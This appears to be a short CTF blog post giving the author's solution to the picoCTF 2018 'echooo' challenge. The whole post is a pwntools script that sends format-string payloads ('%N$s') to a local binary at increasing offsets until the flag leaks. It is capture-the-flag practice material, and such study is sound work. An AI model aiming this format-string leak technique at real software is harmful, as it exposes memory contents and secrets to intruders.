System/Pwnable Practice
Pico CTF 2018 echooo
JeonYoungSin
2019. 8. 4. 23:34
exploit.py
from pwn import *
p = process("./echo")
for i in range(1,100):
try:
p = process("./echo")
payload ="%"+str(i)+"$s"
p.sendlineafter("> ",payload)
result = p.recv(2048)
if "picoCTF" in result:
print result
break
p.close()
except:
print "fail"
p.close()